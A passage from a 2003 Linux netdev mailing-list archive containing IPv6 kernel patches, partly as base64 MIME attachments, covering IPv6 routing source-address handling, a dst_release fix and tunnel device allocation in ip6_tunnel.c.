Yy5wbGVuID0gb3J0LT5ydDZpX3NyYy5wbGVuOw0KICNlbmRpZg0KLQ0KIAkJ cnQtPnJ0NmlfbmV4dGhvcCA9IG5kaXNjX2dldF9uZWlnaChydC0+cnQ2aV9k ZXYsICZydC0+cnQ2aV9nYXRld2F5KTsNCiANCiAJCWRzdF9ob2xkKCZydC0+ dS5kc3QpOw0KQEAgLTczNCw3ICs3MzAsNyBAQA0KIAkJCWlmICghKGd3YV90 eXBlJklQVjZfQUREUl9VTklDQVNUKSkNCiAJCQkJZ290byBvdXQ7DQogDQot CQkJZ3J0ID0gcnQ2X2xvb2t1cChnd19hZGRyLCBOVUxMLCBydG1zZy0+cnRt c2dfaWZpbmRleCwgMSk7DQorCQkJZ3J0ID0gcnQ2X2xvb2t1cChnd19hZGRy LCAmcnRtc2ctPnJ0bXNnX3NyYywgcnRtc2ctPnJ0bXNnX2lmaW5kZXgsIDEp Ow0KIA0KIAkJCWVyciA9IC1FSE9TVFVOUkVBQ0g7DQogCQkJaWYgKGdydCA9 PSBOVUxMKQ0KQEAgLTg3OSw3ICs4NzUsNyBAQA0KIAlzdHJ1Y3QgcnQ2X2lu Zm8gKnJ0LCAqbnJ0Ow0KIA0KIAkvKiBMb2NhdGUgb2xkIHJvdXRlIHRvIHRo aXMgZGVzdGluYXRpb24uICovDQotCXJ0ID0gcnQ2X2xvb2t1cChkZXN0LCBO VUxMLCBuZWlnaC0+ZGV2LT5pZmluZGV4LCAxKTsNCisJcnQgPSBydDZfbG9v a3VwKGRlc3QsIHNhZGRyLCBuZWlnaC0+ZGV2LT5pZmluZGV4LCAxKTsNCiAN CiAJaWYgKHJ0ID09IE5VTEwpDQogCQlyZXR1cm47DQpAQCAtMTA0NCw2ICsx MDQwLDkgQEANCiAJCW5ydCA9IGlwNl9ydF9jb3B5KHJ0KTsNCiAJCWlmIChu cnQgPT0gTlVMTCkNCiAJCQlnb3RvIG91dDsNCisjaWZkZWYgQ09ORklHX0lQ VjZfU1VCVFJFRVMNCisJCW5ydC0+cnQ2aV9zcmMucGxlbiA9IHJ0LT5ydDZp X3NyYy5wbGVuOw0KKyNlbmRpZg0KIAkJaXB2Nl9hZGRyX2NvcHkoJm5ydC0+ cnQ2aV9kc3QuYWRkciwgZGFkZHIpOw0KIAkJbnJ0LT5ydDZpX2RzdC5wbGVu ID0gMTI4Ow0KIAkJbnJ0LT51LmRzdC5mbGFncyB8PSBEU1RfSE9TVDsNCmRp ZmYgLU51ciAtLWV4Y2x1ZGU9UkNTIC0tZXhjbHVkZT1DVlMgLS1leGNsdWRl PVNDQ1MgLS1leGNsdWRlPUJpdEtlZXBlciAtLWV4Y2x1ZGU9Q2hhbmdlU2V0 IGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYvdGNwX2lwdjYuYyBsaW51eC0yLjUv bmV0L2lwdjYvdGNwX2lwdjYuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0L2lw djYvdGNwX2lwdjYuYwlGcmkgSnVsICA0IDIzOjMxOjEzIDIwMDMNCisrKyBs aW51eC0yLjUvbmV0L2lwdjYvdGNwX2lwdjYuYwlGcmkgSnVsICA0IDIzOjMy OjM0IDIwMDMNCkBAIC02NzYsNiArNjc2LDE2IEBADQogCQkJZHN0X3JlbGVh c2UoZHN0KTsNCiAJCQlnb3RvIGZhaWx1cmU7DQogCQl9DQorI2lmZGVmIENP TkZJR19JUFY2X1NVQlRSRUVTDQorCQlkc3RfcmVsZWFzZShkc3QpOw0KKw0K KwkJZHN0ID0gaXA2X3JvdXRlX291dHB1dChzaywgJmZsKTsNCisNCisJCWlm ICgoZXJyID0gZHN0LT5lcnJvcikgIT0gMCkgew0KKwkJCWRzdF9yZWxlYXNl KGRzdCk7DQorCQkJZ290byBmYWlsdXJlOw0KKwkJfQ0KKyNlbmRpZg0KIAkJ c2FkZHIgPSAmZmwuZmw2X3NyYzsNCiAJCWlwdjZfYWRkcl9jb3B5KCZucC0+ cmN2X3NhZGRyLCBzYWRkcik7DQogCX0NCkBAIC02ODQsNyArNjk0LDcgQEAN CiAJaXB2Nl9hZGRyX2NvcHkoJm5wLT5zYWRkciwgc2FkZHIpOw0KIAlpbmV0 LT5yY3Zfc2FkZHIgPSBMT09QQkFDSzRfSVBWNjsNCiANCi0JaXA2X2RzdF9z dG9yZShzaywgZHN0LCBOVUxMKTsNCisJaXA2X2RzdF9zdG9yZShzaywgZHN0 LCBOVUxMLCBOVUxMKTsNCiAJc2stPnNrX3JvdXRlX2NhcHMgPSBkc3QtPmRl di0+ZmVhdHVyZXMgJg0KIAkJCSAgICB+KE5FVElGX0ZfSVBfQ1NVTSB8IE5F VElGX0ZfVFNPKTsNCiANCkBAIC0xMzQ1LDcgKzEzNTUsNyBAQA0KIAlhdG9t aWNfaW5jKCZpbmV0Nl9zb2NrX25yKTsNCiAjZW5kaWYNCiANCi0JaXA2X2Rz dF9zdG9yZShuZXdzaywgZHN0LCBOVUxMKTsNCisJaXA2X2RzdF9zdG9yZShu ZXdzaywgZHN0LCBOVUxMLCBOVUxMKTsNCiAJc2stPnNrX3JvdXRlX2NhcHMg PSBkc3QtPmRldi0+ZmVhdHVyZXMgJg0KIAkJCSAgICB+KE5FVElGX0ZfSVBf Q1NVTSB8IE5FVElGX0ZfVFNPKTsNCiANCkBAIC0xNzM3LDcgKzE3NDcsNyBA QA0KIAkJCXJldHVybiBlcnI7DQogCQl9DQogDQotCQlpcDZfZHN0X3N0b3Jl KHNrLCBkc3QsIE5VTEwpOw0KKwkJaXA2X2RzdF9zdG9yZShzaywgZHN0LCBO VUxMLCBOVUxMKTsNCiAJCXNrLT5za19yb3V0ZV9jYXBzID0gZHN0LT5kZXYt PmZlYXR1cmVzICYNCiAJCQkJICAgIH4oTkVUSUZfRl9JUF9DU1VNIHwgTkVU SUZfRl9UU08pOw0KIAl9DQpAQCAtMTc3OSw3ICsxNzg5LDcgQEANCiAJCQly ZXR1cm4gLXNrLT5za19lcnJfc29mdDsNCiAJCX0NCiANCi0JCWlwNl9kc3Rf c3RvcmUoc2ssIGRzdCwgTlVMTCk7DQorCQlpcDZfZHN0X3N0b3JlKHNrLCBk c3QsIE5VTEwsIE5VTEwpOw0KIAl9DQogDQogCXNrYi0+ZHN0ID0gZHN0X2Ns b25lKGRzdCk7DQpkaWZmIC1OdXIgLS1leGNsdWRlPVJDUyAtLWV4Y2x1ZGU9 Q1ZTIC0tZXhjbHVkZT1TQ0NTIC0tZXhjbHVkZT1CaXRLZWVwZXIgLS1leGNs dWRlPUNoYW5nZVNldCBsaW51eC0yLjUuT0xEL25ldC9pcHY2L3VkcC5jIGxp bnV4LTIuNS9uZXQvaXB2Ni91ZHAuYw0KLS0tIGxpbnV4LTIuNS5PTEQvbmV0 L2lwdjYvdWRwLmMJV2VkIEp1bCAgMiAxNTo0MjowMyAyMDAzDQorKysgbGlu dXgtMi41L25ldC9pcHY2L3VkcC5jCUZyaSBKdWwgIDQgMjM6MzI6MzQgMjAw Mw0KQEAgLTM0NSw3ICszNDUsMTYgQEANCiAJCWRzdF9yZWxlYXNlKGRzdCk7 DQogCQlnb3RvIG91dDsNCiAJfQ0KKyNpZmRlZiBDT05GSUdfSVBWNl9TVUJU UkVFUw0KKwlkc3RfcmVsZWFzZShkc3QpOw0KIA0KKwlkc3QgPSBpcDZfcm91 dGVfb3V0cHV0KHNrLCAmZmwpOw0KKw0KKwlpZiAoKGVyciA9IGRzdC0+ZXJy b3IpICE9IDApIHsNCisJCWRzdF9yZWxlYXNlKGRzdCk7DQorCQlnb3RvIG91 dDsNCisJfQ0KKyNlbmRpZg0KIAlpZiAoaXB2Nl9hZGRyX2FueSgmbnAtPnNh ZGRyKSkNCiAJCWlwdjZfYWRkcl9jb3B5KCZucC0+c2FkZHIsICZmbC5mbDZf c3JjKTsNCiANCkBAIC0zNTYsNyArMzY1LDkgQEANCiANCiAJaXA2X2RzdF9z dG9yZShzaywgZHN0LA0KIAkJICAgICAgIWlwdjZfYWRkcl9jbXAoJmZsLmZs Nl9kc3QsICZucC0+ZGFkZHIpID8NCi0JCSAgICAgICZucC0+ZGFkZHIgOiBO VUxMKTsNCisJCSAgICAgICZucC0+ZGFkZHIgOiBOVUxMLA0KKwkJICAgICAg IWlwdjZfYWRkcl9jbXAoJmZsLmZsNl9zcmMsICZucC0+c2FkZHIpID8NCisJ CSAgICAgICZucC0+c2FkZHIgOiBOVUxMKTsNCiANCiAJc2stPnNrX3N0YXRl ID0gVENQX0VTVEFCTElTSEVEOw0KIG91dDoNCkBAIC05NzAsNyArOTgxLDkg QEANCiANCiAJaXA2X2RzdF9zdG9yZShzaywgZHN0LA0KIAkJICAgICAgIWlw djZfYWRkcl9jbXAoJmZsLmZsNl9kc3QsICZucC0+ZGFkZHIpID8NCi0JCSAg ICAgICZucC0+ZGFkZHIgOiBOVUxMKTsNCisJCSAgICAgICZucC0+ZGFkZHIg OiBOVUxMLA0KKwkJICAgICAgIWlwdjZfYWRkcl9jbXAoJmZsLmZsNl9zcmMs ICZucC0+c2FkZHIpID8NCisJCSAgICAgICZucC0+c2FkZHIgOiBOVUxMKTsN CiAJaWYgKGVyciA+IDApDQogCQllcnIgPSBucC0+cmVjdmVyciA/IG5ldF94 bWl0X2Vycm5vKGVycikgOiAwOw0KIAlyZWxlYXNlX3NvY2soc2spOw0K ---377318441-1491903089-1057357517=:17083-- From vnuorval@tcs.hut.fi Fri Jul 4 17:33:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:33:17 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650X32x015087 for ; Fri, 4 Jul 2003 17:33:03 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 2223B8000A3; Fri, 4 Jul 2003 16:14:19 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64DEI5L015363; Fri, 4 Jul 2003 16:14:18 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64DEInZ015359; Fri, 4 Jul 2003 16:14:18 +0300 Date: Fri, 4 Jul 2003 16:14:18 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com Subject: [PATCH] IPV6: Fix incorrect dst_entry handling in ip6_tunnel.c Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3760 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev Hi, I noticed a bug in ip6ip6_err(), please apply this patch! Thanks, Ville diff -Nur linux-2.5.OLD/net/ipv6/ip6_tunnel.c linux-2.5/net/ipv6/ip6_tunnel.c --- linux-2.5.OLD/net/ipv6/ip6_tunnel.c Fri Jul 4 14:48:21 2003 +++ linux-2.5/net/ipv6/ip6_tunnel.c Fri Jul 4 14:54:53 2003 @@ -506,7 +506,7 @@ icmpv6_send(skb2, rel_type, rel_code, rel_info, skb2->dev); if (rt) - dst_free(&rt->u.dst); + dst_release(&rt->u.dst); kfree_skb(skb2); } -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 From vnuorval@tcs.hut.fi Fri Jul 4 18:23:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 18:23:22 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h651N22x015996 for ; Fri, 4 Jul 2003 18:23:03 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 900BF800221; Fri, 4 Jul 2003 23:23:45 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64KNj5L016899; Fri, 4 Jul 2003 23:23:45 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64KNipn016895; Fri, 4 Jul 2003 23:23:45 +0300 Date: Fri, 4 Jul 2003 23:23:44 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com Subject: [PATCH] IPV6: ipv6-in-ipv6 tunnel using alloc_netdev Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-377318441-1068751107-1057349978=:16323" Content-ID: X-archive-position: 3762 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ---377318441-1068751107-1057349978=:16323 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Hi, I finally had the time to fix ip6_tunnel.c so it also uses alloc_netdev() for creating new tunnel devices. Tested by adding and deleting tunnel device. Patch as attachment... Thanks, Ville -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 ---377318441-1068751107-1057349978=:16323 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="ip6_tnl_dyn_alloc.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="ip6_tnl_dyn_alloc.patch" ZGlmZiAtTnVyIGxpbnV4LTIuNS5PTEQvbmV0L2lwdjYvaXA2X3R1bm5lbC5j IGxpbnV4LTIuNS9uZXQvaXB2Ni9pcDZfdHVubmVsLmMNCi0tLSBsaW51eC0y LjUuT0xEL25ldC9pcHY2L2lwNl90dW5uZWwuYwlGcmkgSnVsICA0IDE0OjQ4 OjIxIDIwMDMNCisrKyBsaW51eC0yLjUvbmV0L2lwdjYvaXA2X3R1bm5lbC5j CUZyaSBKdWwgIDQgMTQ6Mzc6MjQgMjAwMw0KQEAgLTg3LDE4ICs4NywxMSBA QA0KIA0KIHN0YXRpYyBpbnQgaXA2aXA2X2ZiX3RubF9kZXZfaW5pdChzdHJ1 Y3QgbmV0X2RldmljZSAqZGV2KTsNCiBzdGF0aWMgaW50IGlwNmlwNl90bmxf ZGV2X2luaXQoc3RydWN0IG5ldF9kZXZpY2UgKmRldik7DQorc3RhdGljIHZv aWQgaXA2aXA2X3RubF9kZXZfc2V0dXAoc3RydWN0IG5ldF9kZXZpY2UgKmRl dik7DQogDQogLyogdGhlIElQdjYgdHVubmVsIGZhbGxiYWNrIGRldmljZSAq Lw0KLXN0YXRpYyBzdHJ1Y3QgbmV0X2RldmljZSBpcDZpcDZfZmJfdG5sX2Rl diA9IHsNCi0JLm5hbWUgPSAiaXA2dG5sMCIsDQotCS5pbml0ID0gaXA2aXA2 X2ZiX3RubF9kZXZfaW5pdA0KLX07DQorc3RhdGljIHN0cnVjdCBuZXRfZGV2 aWNlICppcDZpcDZfZmJfdG5sX2RldjsNCiANCi0vKiB0aGUgSVB2NiBmYWxs YmFjayB0dW5uZWwgKi8NCi1zdGF0aWMgc3RydWN0IGlwNl90bmwgaXA2aXA2 X2ZiX3RubCA9IHsNCi0JLmRldiA9ICZpcDZpcDZfZmJfdG5sX2RldiwNCi0J LnBhcm1zID17Lm5hbWUgPSAiaXA2dG5sMCIsIC5wcm90byA9IElQUFJPVE9f SVBWNn0NCi19Ow0KIA0KIC8qIGxpc3RzIGZvciBzdG9yaW5nIHR1bm5lbHMg aW4gdXNlICovDQogc3RhdGljIHN0cnVjdCBpcDZfdG5sICp0bmxzX3JfbFtI QVNIX1NJWkVdOw0KQEAgLTIxNiw1OSArMjA5LDM5IEBADQogaXA2X3RubF9j cmVhdGUoc3RydWN0IGlwNl90bmxfcGFybSAqcCwgc3RydWN0IGlwNl90bmwg KipwdCkNCiB7DQogCXN0cnVjdCBuZXRfZGV2aWNlICpkZXY7DQotCWludCBl cnIgPSAtRU5PQlVGUzsNCiAJc3RydWN0IGlwNl90bmwgKnQ7DQorCWNoYXIg bmFtZVtJRk5BTVNJWl07DQorCWludCBlcnI7DQogDQotCWRldiA9IGttYWxs b2Moc2l6ZW9mICgqZGV2KSArIHNpemVvZiAoKnQpLCBHRlBfS0VSTkVMKTsN Ci0JaWYgKCFkZXYpDQotCQlyZXR1cm4gZXJyOw0KKwlpZiAocC0+bmFtZVsw XSkgew0KKwkJc3RybGNweShuYW1lLCBwLT5uYW1lLCBJRk5BTVNJWik7DQor CX0gZWxzZSB7DQorCQlpbnQgaTsNCisJCWZvciAoaSA9IDE7IGkgPCBJUDZf VE5MX01BWDsgaSsrKSB7DQorCQkJc3ByaW50ZihuYW1lLCAiaXA2dG5sJWQi LCBpKTsNCisJCQlpZiAoX19kZXZfZ2V0X2J5X25hbWUobmFtZSkgPT0gTlVM TCkNCisJCQkJYnJlYWs7DQorCQl9DQorCQlpZiAoaSA9PSBJUDZfVE5MX01B WCkgDQorCQkJcmV0dXJuIC1FTk9CVUZTOw0KKwl9DQorCWRldiA9IGFsbG9j X25ldGRldihzaXplb2YgKCp0KSwgbmFtZSwgaXA2aXA2X3RubF9kZXZfc2V0 dXApOw0KKwlpZiAoZGV2ID09IE5VTEwpDQorCQlyZXR1cm4gLUVOT01FTTsN CiANCi0JbWVtc2V0KGRldiwgMCwgc2l6ZW9mICgqZGV2KSArIHNpemVvZiAo KnQpKTsNCi0JZGV2LT5wcml2ID0gKHZvaWQgKikgKGRldiArIDEpOw0KLQl0 ID0gKHN0cnVjdCBpcDZfdG5sICopIGRldi0+cHJpdjsNCi0JdC0+ZGV2ID0g ZGV2Ow0KKwl0ID0gZGV2LT5wcml2Ow0KIAlkZXYtPmluaXQgPSBpcDZpcDZf dG5sX2Rldl9pbml0Ow0KLQltZW1jcHkoJnQtPnBhcm1zLCBwLCBzaXplb2Yg KCpwKSk7DQotCXQtPnBhcm1zLm5hbWVbSUZOQU1TSVogLSAxXSA9ICdcMCc7 DQotCXN0cmNweShkZXYtPm5hbWUsIHQtPnBhcm1zLm5hbWUpOw0KLQlpZiAo IWRldi0+bmFtZVswXSkgew0KLQkJaW50IGkgPSAwOw0KLQkJaW50IGV4aXN0 cyA9IDA7DQotDQotCQlkbyB7DQotCQkJc3ByaW50ZihkZXYtPm5hbWUsICJp cDZ0bmwlZCIsICsraSk7DQotCQkJZXhpc3RzID0gKF9fZGV2X2dldF9ieV9u YW1lKGRldi0+bmFtZSkgIT0gTlVMTCk7DQotCQl9IHdoaWxlIChpIDwgSVA2 X1ROTF9NQVggJiYgZXhpc3RzKTsNCisJdC0+cGFybXMgPSAqcDsNCiANCi0J CWlmIChpID09IElQNl9UTkxfTUFYKSB7DQotCQkJZ290byBmYWlsZWQ7DQot CQl9DQotCQltZW1jcHkodC0+cGFybXMubmFtZSwgZGV2LT5uYW1lLCBJRk5B TVNJWik7DQotCX0NCi0JU0VUX01PRFVMRV9PV05FUihkZXYpOw0KIAlpZiAo KGVyciA9IHJlZ2lzdGVyX25ldGRldmljZShkZXYpKSA8IDApIHsNCi0JCWdv dG8gZmFpbGVkOw0KKwkJa2ZyZWUoZGV2KTsNCisJCXJldHVybiBlcnI7DQog CX0NCisJZGV2X2hvbGQoZGV2KTsNCisNCiAJaXA2aXA2X3RubF9saW5rKHQp Ow0KIAkqcHQgPSB0Ow0KIAlyZXR1cm4gMDsNCi1mYWlsZWQ6DQotCWtmcmVl KGRldik7DQotCXJldHVybiBlcnI7DQotfQ0KLQ0KLS8qKg0KLSAqIGlwNl90 bmxfZGVzdHJveSgpIC0gZGVzdHJveSBvbGQgdHVubmVsDQotICogICBAdDog dHVubmVsIHRvIGJlIGRlc3Ryb3llZA0KLSAqDQotICogUmV0dXJuOg0KLSAq ICAgd2hhdGV2ZXIgdW5yZWdpc3Rlcl9uZXRkZXZpY2UoKSByZXR1cm5zDQot ICoqLw0KLQ0KLXN0YXRpYyBpbmxpbmUgaW50DQotaXA2X3RubF9kZXN0cm95 KHN0cnVjdCBpcDZfdG5sICp0KQ0KLXsNCi0JcmV0dXJuIHVucmVnaXN0ZXJf bmV0ZGV2aWNlKHQtPmRldik7DQogfQ0KIA0KIC8qKg0KQEAgLTMwNCwyNCAr Mjc3LDEzIEBADQogCQkJcmV0dXJuIChjcmVhdGUgPyAtRUVYSVNUIDogMCk7 DQogCQl9DQogCX0NCi0JaWYgKCFjcmVhdGUpIHsNCisJaWYgKCFjcmVhdGUp DQogCQlyZXR1cm4gLUVOT0RFVjsNCi0JfQ0KKwkNCiAJcmV0dXJuIGlwNl90 bmxfY3JlYXRlKHAsIHB0KTsNCiB9DQogDQogLyoqDQotICogaXA2aXA2X3Ru bF9kZXZfZGVzdHJ1Y3RvciAtIHR1bm5lbCBkZXZpY2UgZGVzdHJ1Y3Rvcg0K LSAqICAgQGRldjogdGhlIGRldmljZSB0byBiZSBkZXN0cm95ZWQNCi0gKiov DQotDQotc3RhdGljIHZvaWQNCi1pcDZpcDZfdG5sX2Rldl9kZXN0cnVjdG9y KHN0cnVjdCBuZXRfZGV2aWNlICpkZXYpDQotew0KLQlrZnJlZShkZXYpOw0K LX0NCi0NCi0vKioNCiAgKiBpcDZpcDZfdG5sX2Rldl91bmluaXQgLSB0dW5u ZWwgZGV2aWNlIHVuaW5pdGlhbGl6ZXINCiAgKiAgIEBkZXY6IHRoZSBkZXZp Y2UgdG8gYmUgZGVzdHJveWVkDQogICogICANCkBAIC0zMzIsMTQgKzI5NCwx NCBAQA0KIHN0YXRpYyB2b2lkDQogaXA2aXA2X3RubF9kZXZfdW5pbml0KHN0 cnVjdCBuZXRfZGV2aWNlICpkZXYpDQogew0KLQlpZiAoZGV2ID09ICZpcDZp cDZfZmJfdG5sX2Rldikgew0KKwlpZiAoZGV2ID09IGlwNmlwNl9mYl90bmxf ZGV2KSB7DQogCQl3cml0ZV9sb2NrX2JoKCZpcDZpcDZfbG9jayk7DQogCQl0 bmxzX3djWzBdID0gTlVMTDsNCiAJCXdyaXRlX3VubG9ja19iaCgmaXA2aXA2 X2xvY2spOw0KIAl9IGVsc2Ugew0KLQkJc3RydWN0IGlwNl90bmwgKnQgPSAo c3RydWN0IGlwNl90bmwgKikgZGV2LT5wcml2Ow0KLQkJaXA2aXA2X3RubF91 bmxpbmsodCk7DQorCQlpcDZpcDZfdG5sX3VubGluaygoc3RydWN0IGlwNl90 bmwgKikgZGV2LT5wcml2KTsNCiAJfQ0KKwlkZXZfcHV0KGRldik7DQogfQ0K IA0KIC8qKg0KQEAgLTg3OCw3ICs4NDAsNiBAQA0KIAl9DQogfQ0KIA0KLQ0K IHN0YXRpYyB2b2lkIGlwNmlwNl90bmxfbGlua19jb25maWcoc3RydWN0IGlw Nl90bmwgKnQpDQogew0KIAlzdHJ1Y3QgbmV0X2RldmljZSAqZGV2ID0gdC0+ ZGV2Ow0KQEAgLTkwNiwzMSArODY3LDI1IEBADQogCWlmIChwLT5mbGFncyAm IElQNl9UTkxfRl9DQVBfWE1JVCkgew0KIAkJc3RydWN0IHJ0Nl9pbmZvICpy dCA9IHJ0Nl9sb29rdXAoJnAtPnJhZGRyLCAmcC0+bGFkZHIsDQogCQkJCQkJ IHAtPmxpbmssIDApOw0KLQkJaWYgKHJ0KSB7DQotCQkJc3RydWN0IG5ldF9k ZXZpY2UgKnJ0ZGV2Ow0KLQkJCWlmICghKHJ0ZGV2ID0gcnQtPnJ0NmlfZGV2 KSB8fA0KLQkJCSAgICBydGRldi0+dHlwZSA9PSBBUlBIUkRfVFVOTkVMNikg ew0KLQkJCQkvKiBhcyBsb25nIGFzIHR1bm5lbHMgdXNlIHRoZSBzYW1lIHNv Y2tldCANCi0JCQkJICAgZm9yIHRyYW5zbWlzc2lvbiwgbG9jYWxseSBuZXN0 ZWQgdHVubmVscyANCi0JCQkJICAgd29uJ3Qgd29yayAqLw0KLQkJCQlkc3Rf cmVsZWFzZSgmcnQtPnUuZHN0KTsNCi0JCQkJZ290byBub19saW5rOw0KLQkJ CX0gZWxzZSB7DQotCQkJCWRldi0+aWZsaW5rID0gcnRkZXYtPmlmaW5kZXg7 DQotCQkJCWRldi0+aGFyZF9oZWFkZXJfbGVuID0gcnRkZXYtPmhhcmRfaGVh ZGVyX2xlbiArDQotCQkJCQlzaXplb2YgKHN0cnVjdCBpcHY2aGRyKTsNCi0J CQkJZGV2LT5tdHUgPSBydGRldi0+bXR1IC0gc2l6ZW9mIChzdHJ1Y3QgaXB2 Nmhkcik7DQotCQkJCWlmIChkZXYtPm10dSA8IElQVjZfTUlOX01UVSkNCi0J CQkJCWRldi0+bXR1ID0gSVBWNl9NSU5fTVRVOw0KLQkJCQkNCi0JCQkJZHN0 X3JlbGVhc2UoJnJ0LT51LmRzdCk7DQotCQkJfQ0KKw0KKwkJaWYgKHJ0ID09 IE5VTEwpDQorCQkJcmV0dXJuOw0KKw0KKwkJLyogYXMgbG9uZyBhcyB0dW5u ZWxzIHVzZSB0aGUgc2FtZSBzb2NrZXQgZm9yIHRyYW5zbWlzc2lvbiwNCisJ CSAgIGxvY2FsbHkgbmVzdGVkIHR1bm5lbHMgd29uJ3Qgd29yayAqLw0KKwkJ DQorCQlpZiAocnQtPnJ0NmlfZGV2ICYmIHJ0LT5ydDZpX2Rldi0+dHlwZSAh PSBBUlBIUkRfVFVOTkVMNikgew0KKwkJCWRldi0+aWZsaW5rID0gcnQtPnJ0 NmlfZGV2LT5pZmluZGV4Ow0KKw0KKwkJCWRldi0+aGFyZF9oZWFkZXJfbGVu ID0gcnQtPnJ0NmlfZGV2LT5oYXJkX2hlYWRlcl9sZW4gKw0KKwkJCQlzaXpl b2YgKHN0cnVjdCBpcHY2aGRyKTsNCisNCisJCQlkZXYtPm10dSA9IHJ0LT5y dDZpX2Rldi0+bXR1IC0gc2l6ZW9mIChzdHJ1Y3QgaXB2Nmhkcik7DQorDQor CQkJaWYgKGRldi0+bXR1IDwgSVBWNl9NSU5fTVRVKQ0KKwkJCQlkZXYtPm10 dSA9IElQVjZfTUlOX01UVTsNCiAJCX0NCi0JfSBlbHNlIHsNCi0Jbm9fbGlu azoNCi0JCWRldi0+aWZsaW5rID0gMDsNCi0JCWRldi0+aGFyZF9oZWFkZXJf bGVuID0gTExfTUFYX0hFQURFUiArIHNpemVvZiAoc3RydWN0IGlwdjZoZHIp Ow0KLQkJZGV2LT5tdHUgPSBFVEhfREFUQV9MRU4gLSBzaXplb2YgKHN0cnVj dCBpcHY2aGRyKTsNCisJCWRzdF9yZWxlYXNlKCZydC0+dS5kc3QpOw0KIAl9 DQogfQ0KIA0KQEAgLTk5NSw3ICs5NTAsNyBAQA0KIA0KIAlzd2l0Y2ggKGNt ZCkgew0KIAljYXNlIFNJT0NHRVRUVU5ORUw6DQotCQlpZiAoZGV2ID09ICZp cDZpcDZfZmJfdG5sX2Rldikgew0KKwkJaWYgKGRldiA9PSBpcDZpcDZfZmJf dG5sX2Rldikgew0KIAkJCWlmIChjb3B5X2Zyb21fdXNlcigmcCwNCiAJCQkJ CSAgIGlmci0+aWZyX2lmcnUuaWZydV9kYXRhLA0KIAkJCQkJICAgc2l6ZW9m IChwKSkpIHsNCkBAIC0xMDI0LDcgKzk3OSw3IEBADQogCQkJZXJyID0gLUVG QVVMVDsNCiAJCQlicmVhazsNCiAJCX0NCi0JCWlmICghY3JlYXRlICYmIGRl diAhPSAmaXA2aXA2X2ZiX3RubF9kZXYpIHsNCisJCWlmICghY3JlYXRlICYm IGRldiAhPSBpcDZpcDZfZmJfdG5sX2Rldikgew0KIAkJCXQgPSAoc3RydWN0 IGlwNl90bmwgKikgZGV2LT5wcml2Ow0KIAkJfQ0KIAkJaWYgKCF0ICYmIChl cnIgPSBpcDZpcDZfdG5sX2xvY2F0ZSgmcCwgJnQsIGNyZWF0ZSkpKSB7DQpA QCAtMTA1Miw3ICsxMDA3LDcgQEANCiAJCWlmICghY2FwYWJsZShDQVBfTkVU X0FETUlOKSkNCiAJCQlicmVhazsNCiANCi0JCWlmIChkZXYgPT0gJmlwNmlw Nl9mYl90bmxfZGV2KSB7DQorCQlpZiAoZGV2ID09IGlwNmlwNl9mYl90bmxf ZGV2KSB7DQogCQkJaWYgKGNvcHlfZnJvbV91c2VyKCZwLCBpZnItPmlmcl9p ZnJ1LmlmcnVfZGF0YSwNCiAJCQkJCSAgIHNpemVvZiAocCkpKSB7DQogCQkJ CWVyciA9IC1FRkFVTFQ7DQpAQCAtMTA2MSwxNCArMTAxNiwxNCBAQA0KIAkJ CWVyciA9IGlwNmlwNl90bmxfbG9jYXRlKCZwLCAmdCwgMCk7DQogCQkJaWYg KGVycikNCiAJCQkJYnJlYWs7DQotCQkJaWYgKHQgPT0gJmlwNmlwNl9mYl90 bmwpIHsNCisJCQlpZiAodCA9PSBpcDZpcDZfZmJfdG5sX2Rldi0+cHJpdikg ew0KIAkJCQllcnIgPSAtRVBFUk07DQogCQkJCWJyZWFrOw0KIAkJCX0NCiAJ CX0gZWxzZSB7DQogCQkJdCA9IChzdHJ1Y3QgaXA2X3RubCAqKSBkZXYtPnBy 